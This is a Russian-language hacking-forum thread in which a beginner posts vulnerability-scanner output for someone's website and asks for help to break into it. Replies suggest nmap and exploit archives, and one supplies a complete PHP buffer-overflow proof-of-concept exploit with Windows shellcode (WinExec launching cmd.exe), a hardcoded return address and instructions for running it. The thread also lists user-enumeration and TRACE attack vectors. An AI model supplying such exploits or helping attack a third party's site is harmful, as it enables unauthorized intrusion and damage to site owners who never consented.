Нашел уязвимость, как воспользоваться? Помогите

Привет, всем.
Я начинающий, но уже немного понимаю.

В общем с помощью проги xspider нашёл уязвимости на сайте. Помогите хоть одной из них воспользоваться. Вот они:

Переполнение буфера (PHP)
Краткое описание
Уязвимость позволяет удаленному пользователю вызвать отказ в обслуживании или выполнить произвольный код на целевой системе.
Подробное описание
Уязвимость существует из-за ошибки проверки границ данных в функциях "htmlentities()" и "htmlspecialchars()". Злоумышленник может передать специально сформированные данные PHP приложению, использующему уязвимые функции, вызвать переполнение буфера и выполнить произвольный код на целевой системе.
Уязвимые версии
PHP 5.1.6 и предыдущие
PHP 4.4.4 и предыдущие
Использование уязвимости
Использование уязвимости удаленно: да
Использование уязвимости локально: да
Базовая оценка по системе CVSS
CVSS Base Score: 6.8
(AV:R/AC:H/Au:NR/C/I/A:C/B:A)
Ложные срабатывания (False Positives)
Вывод о наличии уязвимости сделан на основе версии по результатам идентификации сервисов и приложений на сканируемом узле. Если при установке обновления номер версии не менялся, возможно ложное обнаружение уязвимости.
Пропуск уязвимости (False Negatives)
Случаев пропуска уязвимости зарегистрировано не было. Причины возможных пропусков неизвестны.

Поиск пользователей

При включенном на сервере модуле mod_userdir возможно определение наличия пользователя в системе. В дальнейшем атакующий может воспользоваться этим для подбора пароля к существующему пользователю.
Например: /~root

Доступен метод TRACEС помощью использования метода TRACE в протоколе HTTP возможно выполнение атаки межсайтовый скриптинг.

Доступна информация
Список cookie

Ссылка - /
auc=62281383d41af61758c11cf29f40f049

Помогите пожалуйста, ломануть этого ламера.

 

просканил спайдером и всё великий хакер!)))))
доверяешь эвристическому методу сканирования????
вообще лучше nmap'ом сканил бы))))
хочешь на заказ, сделают люди конечно не бесплатно!
если на заказ то тогда это не в этот раздел!

 

Ты знаешь хоть смысл этого слова?

 

дебил?? сидиш и понты кидаеш! сам то ты крутой хэккер?

человек сразу написал что он сканил спайдером, что нетак?
он на скани, и спрашивает как заюзать, что тебе ненравица?

 

насчет переполнения буфера - используй экспроит, если таковой имеется.
продолжай анализ вручную, спайдер тебе далеко не всегда поможет.

 

Люди у меня ещё вопросик, он возможно глупый, но я тоже пока не умный в хакинге.
В общем я решил базы набраться для взлома сайта. Не знаете, есть какая нибудь специальная литература? или, как правильно сказать с чего вы начинали? и рады тому, что с этого начали.

 

Большой Faq для новичков
http://forum.antichat.ru/thread32872.html

 

действую вот так:
nmap->milworm->hacked
firefox->site->manual scan->hacked

 

ссылку в студию...

 

scrat это ты к чему?

 

Вот почитай: http://securityvulns.ru/Gnews772.html

 

а он к тому же, что и ты постил... это и я так могу апапваыфЫВАУАПТАПЫВ ПОМОГИТЕ С ЛАМЕРОМ щас я думаю(надеюсь) с ламером модеры или админы помогут топ удалят... видел твой топ седня просто думаю новый, критиковать не стоит, а он блин продолжает....

to Legalz на будующее....

не все то золото, что плохо лежит

 

Человек начинает надо помогать таким , а то потом 2 года дадут за обычный взлом.

По твоей проблеме есть сплоит , правда не знаю рабочий ли он! !!!

Code:

<?php
//PHP 5.1.6 with PECL phpDOC confirm_phpdoc_compiled() local buffer overflow poc exploit


if (!extension_loaded("phpDOC")){
die("you need the phpDOC extension loaded.");
}


$____scode=
"\xeb\x1b".
"\x5b".
"\x31\xc0".
"\x50".
"\x31\xc0".
"\x88\x43\x59".
"\x53".
"\xbb\xca\x73\xe9\x77". //WinExec
"\xff\xd3".
"\x31\xc0".
"\x50".
"\xbb\x5c\xcf\xe9\x77". //ExitProcess
"\xff\xd3".
"\xe8\xe0\xff\xff\xff".
"\x63\x6d\x64".
"\x2e".
"\x65".
"\x78\x65".
"\x20\x2f".
"\x63\x20".
"start notepad & ";

//eip & ecx set to the same value ...
$eip="\x47\x30\xE9\x77";//0x77E93047      pop ECX - pop - retbis kernel32.dll
//and further (junk...) inc edi, xor cl ch, *ja short* 
//should work on sp4 if you find an usable address
$____suntzu=str_repeat("\x90",1393 - strlen($____scode)).$____scode.str_repeat("\x90",30).$eip.str_repeat("\x90",12);
confirm_phpdoc_compiled($____suntzu);

?>

Для юза надо просто указать путь к php пример: cmd >php.exe sploit.php
Но твой скан это просто эвристика. Лучше nmap! Скинь ссылку посмотреть!

 

Oo
Вы наркоманы.

А ты вообще сумашедший.


fly

Ты знаешь что такое локальный эксплойт ?